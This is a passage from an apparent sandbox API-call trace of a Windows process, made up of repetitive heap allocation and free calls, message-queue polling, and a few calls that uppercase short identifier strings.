hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.923] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0254.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.925] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.926] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.926] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.929] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.931] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.932] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.932] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.933] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.933] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.933] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.933] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, 